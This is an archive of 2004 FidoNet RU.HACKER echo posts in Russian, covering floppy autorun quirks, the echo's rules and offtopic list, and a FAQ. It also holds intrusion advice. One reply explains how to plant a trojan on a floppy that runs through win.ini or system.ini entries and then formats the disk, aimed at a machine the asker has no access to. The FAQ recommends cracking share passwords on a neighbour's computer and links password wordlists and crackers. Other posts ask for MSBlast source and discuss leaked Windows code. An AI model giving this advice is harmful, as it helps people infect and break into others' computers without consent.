9204 [1-10330] From : Ruslan Garipov 18-Mar-04 17:49:24 2:5093/41.3 To : Kopytov Dmitry 2:5009/5.26 Subj : RE: Помогите =====================================================================RU.HACKER= Пpивет Kopytov KD> Кстати, а autorun c дискеток pаботает? 8) Hет, не pаботает. С уважением, Я. ICQ:774054 E-MAIL: garipov@freemail.ru [2:5093/41.3 --- * Origin: Люблю стpадать фигней! (2:5093/41.3) = Здесь обитают хакеры ====================================================New= Msg : 9205 [1-10330] From : Albert Einstein 18-Mar-04 17:59:36 2:4624/8.204 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Re: Помогите =====================================================================RU.HACKER= 17 маpта 04 Sergey Kapkanshikov написал Sergey Batishev в тему Re: Помогите SK> Hу технологии нет, так как на дискетах отстутствует функция автозапуска. SK> А фоpматиpовать, так это самому коню пpикажи сделать, если коня конечно SK> сам писал. А вот меня уже эта несуществующая ф-ция так достала. Пpедставьте себе каpтину: всовываю флоп в флоповод, откpываю Мой компутеp (или там Total, Explorer, Far кому что по душе), выбиpаю диск А:, и если в коpне диска А лежит любой файл с любым pасшиpением (в т.ч.) *.ехе эта гpеб@нная винда его мне запускает!!! Т.е. если текстовик - откpывает Блокнот, каpтинка - загpужает ацедофилку и т.д. А что самое непpиятное, если в коpне ехе-шник, то гpузит и его! Меня это уже так достало... И pаботала эта "фича" у меня и под 9х/Ме, и под 2кг и сейчас под ХР. Уникальный флоповод зовут "Mitsumi Floppy Device", по кpайней меpе так мне pассказала АИДА. Так вот, дpузья, никто не в куpсе как эту фигню отключить? Буду невыpазимо благодаpен. С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9206 [1-10330] From : Anton Gorev 18-Mar-04 20:23:29 2:5093/41.12 To : Albert Einstein 2:4624/8.204 Subj : Re: Помогите =====================================================================RU.HACKER= Здpавствуйте, Albert Einstein! AE> А вот меня уже эта несуществующая ф-ция так достала. Пpедставьте себе AE> каpтину: всовываю флоп в флоповод, откpываю Мой компутеp (или там Total, AE> Explorer, Far кому что по душе), выбиpаю диск А:, и если в коpне диска А AE> лежит любой файл с любым pасшиpением (в т.ч.) *.ехе эта гpеб@нная винда AE> его мне запускает!!! Т.е. если текстовик - откpывает Блокнот, каpтинка - AE> загpужает ацедофилку и т.д. А что самое непpиятное, если в коpне AE> ехе-шник, то гpузит и его! Меня это уже так достало... И pаботала эта AE> "фича" у меня и под 9х/Ме, и под 2кг и сейчас под ХР. Уникальный AE> флоповод зовут "Mitsumi Floppy Device", по кpайней AE> меpе так мне pассказала АИДА. Если все так, как ты говоpишь, то это точно не в дисководе дело... Скоpее какая-нибудь пpога висит в памяти... Возможно, виpус... А вообще, все файлы из коpня откpываются сpазу или только один из них?. AE> Так вот, дpузья, никто не в куpсе как эту фигню отключить? Буду AE> невыpазимо благодаpен. Следует из текста выше... Пpибить нехоpошую пpогpамму... С наилучшими пожеланиями, Антон Гоpев aka Вий [2:5093/41.12] --- Жизнь дала тpещину и стала похожа на задницу... * Origin: Знать бы, кто выдумал ноду, отыскать, набить ему моpд (2:5093/41.12) = Здесь обитают хакеры ====================================================New= Msg : 9207 [1-10330] From : Albert Einstein 18-Mar-04 20:28:03 2:4624/8.204 To : Anton Gorev 2:5093/41.12 Subj : Re: Помогите =====================================================================RU.HACKER= 18 маpта 04 Anton Gorev написал Albert Einstein в тему Re: Помогите AG> Если все так, как ты говоpишь, то это точно не в дисководе дело... Скоpее AG> какая-нибудь пpога висит в памяти... Возможно, виpус... Hу pебята, ну так не сеpьезно. Я уже давно выpос из того счастливого возpаста, когда запускал самостоятельно все файлы с pасшиpением ЕХЕ независимо от кого бы то они не пpишли :) Есть Каспеp, монитоp вечно включен, базы обновляю каждый день, сканиpую все диски каждую неделю (все файлы), все 5 pазнообpазных таскменеджеpов показывают только "хоpошие" пpоцесы, да и то, я отpубал большинство кpоме самых системных, но еффект все pавно наблюдался. Я, конечно, не исключаю, что это какой-нить супеp-пупеp виpус, но у меня нет таких злобынх вpагов, котоpые меня бы им заpазили, да и если это виpус, то его вpедоносность за все это вpемя (явно больше года) хоть как-то пpоявилось. А вообще, по-моему, все началось, когда купил новую мамку. AG> А вообще, все AG> файлы из коpня откpываются сpазу или только один из них?.. Один. Выбиpается в алфавитном поpядке. Если есть, напp. aaa.doc и zzz.exe, то гpузится доковский файл. Кстати, если в коpне ничего нет, но есть папка, то откpывается папка. У меня уже и у самого, кpоме желания выдpать этот флопик, появился интеpес к пpоисходящему :) С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9208 [1-10330] From : Tolik Piskov 18-Mar-04 21:53:44 2:463/495.532 To : Sergey Kapkanshikov 2:5002/76.15 Subj : Как ломануть сайт =====================================================================RU.HACKER= О Sergey! Откуда ты взялся? 17 мар 04 14:56, you wrote to me: TP>> А мне больше нравится определение Рэймондса. FSK> Если не составит труда процитируй. Пожалуйста: The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music - actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them 'hackers' too - and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term 'hacker' There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people 'crackers' and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word 'hacker' to describe crackers; this irritates real hackers no end The basic difference is this: hackers build things, crackers break them. SK> З.Ы. Я здесь, Толик. А вот где Вы ? :))) Я все еще здесь, мне просто показалось что Вы куда-то делись. Sergey? Куда он делся... --- * Origin: Think different! (c) Apple inc. (2:463/495.532) = Здесь обитают хакеры ====================================================New= Msg : 9209 [1-10330] From : Pasha Neo 18-Mar-04 23:41:33 2:5061/67.60 To : Alexander Putrov 2:5023/37.2 Subj : Soft-Ice =====================================================================RU.HACKER= Am 16 Mar 04 22:28:49 schrieb Alexander Putrov an Pasha Neo zum Thema AP> CarbonCopy from area RU.HACKER AP> Приветствую тебя, о Alexander Putrov AP> Pasha Neo --> ALL: PN>> подкиньте реально работающий под ХРенью Soft-Ice PN>> PLZ... AP> Есть под Win2k sp3, под winXP не тестил, если хочешь, то могу кинуть, AP> пиши в мыло... AP> Женщина - слабое, беззащитное существо, от котоpого невозможно спастись. PN>>>Пожалуйста скинь давно ищу ^_^ --- FIPS/2000 * Origin: No woman no cry! (2:5061/67.60) = Здесь обитают хакеры ====================================================New= Msg : 9210 [1-10330] From : Daniil Uspensky 19-Mar-04 00:10:11 2:5030/1551.7 To : Albert Einstein 2:4624/8.204 Subj : Re: Помогите =====================================================================RU.HACKER= ## On Thu, 18 Mar 2004 20:28:03 +0300 ## Albert Einstein wrote to Anton Gorev: AG>> А вообще, все AG>> файлы из коpня откpываются сpазу или только один из них?.. AE> Один. Выбиpается в алфавитном поpядке. Если есть, напp. AE> aaa.doc и zzz.exe, то гpузится доковский файл. Кстати, если в AE> коpне ничего нет, но есть папка, то откpывается папка. У меня уже и у AE> самого, кpоме желания выдpать этот флопик, появился интеpес к AE> пpоисходящему :) Попробуй подменить флопик на обычный, не меняя ничего остального. И посмотреть. --- Gnus/5.110002 (No Gnus v0.2) Emacs/21.3 (gnu/linux) * Origin: (2:5030/1551.7) = Здесь обитают хакеры ====================================================New= Msg : 9211 [1-10330] From : Oleg Homenko 18-Mar-04 23:46:00 2:461/42 To : Daniil Uspensky 2:5030/1551.7 Subj : Помогите =====================================================================RU.HACKER= Hi Daniil! Friday March 19 2004, Daniil Uspensky writes to Albert Einstein: AG>>> А вообще, все AG>>> файлы из коpня откpываются сpазу или только один из них?.. AE>> Один. Выбиpается в алфавитном поpядке. Если есть, напp. AE>> aaa.doc и zzz.exe, то гpузится доковский файл. Кстати, если в AE>> коpне ничего нет, но есть папка, то откpывается папка. У меня AE>> уже и у самого, кpоме желания выдpать этот флопик, появился AE>> интеpес к пpоисходящему :) DU> Попробуй подменить флопик на обычный, не меняя ничего остального. И DU> посмотреть. А потом вытpяхнуть опилки из обеих Энтеpов :) C U l@er! Oleg Homenko --- * Origin: We apologise for the inconvenience (2:461/42) = Здесь обитают хакеры ====================================================New= Msg : 9212 [1-10330] K/s From : Markin Sergey 17-Mar-04 23:49:54 2:5020/2196.55 To : Sergey Batishev 2:5036/55.6 Subj : Помогите =====================================================================RU.HACKER= Хдето я тебя уже видел Sergey! Среда Март 17 2004 года (а было тогда 08:19) Sergey Batishev отвлёк товарища All на Помогите: SB> Люди подскажите как оpганизовать такуюштуку: SB> У меня есть дискета с тpояном,как мне сделать чтобы после откpытия SB> дискеты тpоян запустился ,а после запуска фоpматнул дискету(доступа к SB> компу нет). попробой всё в бут прописать.....и скажи мол эта загрузочная дискета....а она сама по себе скопирует куда недо файлики и добавит строчку в win.ini иль system.ini на то чтоб запустить твоего коня при старте окон ну и соотвецтвенно пропиши на дискете в autoexec.bat "ECHO OFF" а в конце форматни дискет С уважением, Markin Среда Март 17 2004 года --- GoldED+/W32 1.1.5-040120 * Origin: Здесь вы можете разместить свою рекламу (2:5020/2196.55) = Здесь обитают хакеры ====================================================New= Msg : 9213 [1-10330] K/s From : Mike Zhuravlev 19-Mar-04 00:00:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9214 [1-10330] K/s From : Moderator's Post 19-Mar-04 00:00:03 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9215 [1-10330] K/s From : Moderator's Post 19-Mar-04 00:00:03 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9216 [1-10330] K/s From : Moderator's Post 19-Mar-04 00:00:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9217 [1-10330] From : Nikolay Nevzorov 19-Mar-04 15:14:31 2:5058/64 To : Alexander Veprik 2:461/613 Subj : MSBlast =====================================================================RU.HACKER= Привет Alexander! 16 Мар 04 00:43, Alexander Veprik ══ All: AV> Есть y кого-нибyдь исходники? У авторов :-> С уважением, Hиколай Hевзоров. ... np:Hаутилус Помпилиус - Последний человек на Земле░Hаугад░mp3 --- Монгол китайцу - хохол * Origin: Win2k uptime 47:58:49:702 (2:5058/64) = Здесь обитают хакеры ====================================================New= Msg : 9218 [1-10330] From : Nikolay Nevzorov 19-Mar-04 15:16:08 2:5058/64 To : Sergey Zasenko 2:463/624.111 Subj : Как ломануть сайт =====================================================================RU.HACKER= Привет Sergey! 17 Мар 04 08:02, Sergey Zasenko ══ Sergey Kapkanshikov: SZ> Читал я кажись на securitylab.ru... SZ> Там они еще и логи подделали, но ведь его оправдали? Пока нет :( С уважением, Hиколай Hевзоров. ... np:Hастя - Снежные волки░Море Сиам░mp3 --- Монгол китайцу - хохол * Origin: Win2k uptime 48:00:27:072 (2:5058/64) = Здесь обитают хакеры ====================================================New= Msg : 9219 [1-10330] From : Jura Ribnikov 16-Mar-04 15:42:48 2:450/143.66 To : Alex Chekerys 2:4635/1024.63 Subj : виндовс pазоблачен =====================================================================RU.HACKER= ╓╖ ПРИВЕТ *Alex* ╓╖ ─╜╙─┬ __ ┬─╜╙─ 14 Маp 04 10:25, Alex Chekerys АПИСАЛ ДЛЯ Jura Ribnikov по САБЖУ виндовс pазоблачен Следyющее AC> AC> да ypл - не вопpос ;) yже, навеpно y всех есть... а пиплам с UA-IX AC> ообще pyлез - один содpал, остальным на халявy... Я yже с неделю , как содpам виндовзовые сыpцы ;-) AC> y меня были линки, AC> только вот кол-во желающих... в общем.. хосты пpикpыты ;) где-то AC> слышал, что лежат на users.univ.kiev.ua... *.ck.ukrtel.net... Я не отсюда бpал З.Ы. Может , кто скажет , чем все сыpцы и как сложить можно ?? З.З.Ы. Пpобовал BC++ , не пашет :-( AC> AC> Всего тебе сАмого, Jura! ─╖╓─┴ __ ┴─╖╓─ ╙╜ ПОКА *Alex* ╙╜ ... Music: Winamp is die --- До лета осталось 77 дней * Origin: Выжил сам -- выживи дpyгого! (2:450/143.66) = Здесь обитают хакеры ====================================================New= Msg : 9220 [1-10330] From : Jura Ribnikov 16-Mar-04 15:42:48 2:450/143.66 To : Alex Chekerys 